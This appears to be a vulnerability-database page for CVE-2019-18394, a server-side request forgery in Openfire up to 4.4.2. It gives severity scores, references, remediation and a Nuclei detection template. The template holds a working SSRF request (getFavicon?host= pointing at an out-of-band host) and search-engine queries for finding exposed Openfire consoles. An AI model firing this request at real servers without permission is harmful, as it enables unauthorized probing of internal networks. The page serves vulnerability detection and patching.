Lucene search
Ignite Realtime Openfire <=4.4.2 - Server-Side Request Forgery
Ignite Realtime Openfire <=4.4.2 - Server-Side Request Forgery allows attackers to send crafted requests to internal resources, resulting in unauthorized access or information disclosur
Show more
| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
 | Server-Side Request Forgery (SSRF) | 25 Oct 201902:46 | – | veracode |
 | CVE-2019-18394 | 24 Oct 201910:58 | – | cvelist |
| CVE-2021-45968 | 18 Mar 202204:56 | – | cvelist |
 | Ignite Realtime Openfire vulnerable to Server Side Request Forgery | 24 May 202216:59 | – | github |
 | Server side request forgery (ssrf) | 24 Oct 201911:15 | – | prion |
| Server side request forgery (ssrf) | 18 Mar 202205:15 | – | prion |
 | CVE-2019-18394 | 24 Oct 201911:15 | – | cve |
| CVE-2021-45968 | 18 Mar 202205:15 | – | cve |
 | CVE-2019-18394 | 24 Oct 201900:00 | – | attackerkb |
 | CVE-2019-18394 | 24 Oct 201911:15 | – | osv |
10
id: CVE-2019-18394
info:
name: Ignite Realtime Openfire <=4.4.2 - Server-Side Request Forgery
author: pdteam
severity: critical
description: Ignite Realtime Openfire through version 4.4.2 allows attackers to send arbitrary HTTP GET requests in FaviconServlet.java, resulting in server-side request forgery.
impact: |
An attacker can exploit this vulnerability to send crafted requests to internal resources, leading to unauthorized access or information disclosure.
remediation: |
Upgrade to the latest version of Ignite Realtime Openfire (>=4.4.3) to fix this vulnerability.
reference:
- https://swarm.ptsecurity.com/openfire-admin-console/
- https://github.com/igniterealtime/Openfire/pull/1497
- https://nvd.nist.gov/vuln/detail/CVE-2019-18394
- https://github.com/sobinge/nuclei-templates
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2019-18394
cwe-id: CWE-918
epss-score: 0.70889
epss-percentile: 0.98041
cpe: cpe:2.3:a:igniterealtime:openfire:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: igniterealtime
product: openfire
shodan-query:
- http.title:"openfire admin console"
- http.title:"openfire"
fofa-query:
- title="openfire"
- title="openfire admin console"
google-query:
- intitle:"openfire"
- intitle:"openfire admin console"
tags: cve,cve2019,ssrf,openfire,oast,igniterealtime
http:
- method: GET
path:
- "{{BaseURL}}/getFavicon?host=http://oast.fun/"
matchers:
- type: dsl
dsl:
- "contains(body, 'Interactsh Server')"
- status_code == 200
condition: and
# digest: 4a0a00473045022100befba9a9ad77698ec07213ab51f8c3a8a2c18c7c328b00d9c60c6c3b3640ae15022019003c9f432deb1e617ad9e8d0b18512a10cf469854e2e5ff5bb6ed680d66864:922c64590222798bb761d5b6d8e72950Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo04 Aug 2020 15:24Current
8.5High risk
Vulners AI Score8.5
CVSS27.5
CVSS39.8
EPSS0.93719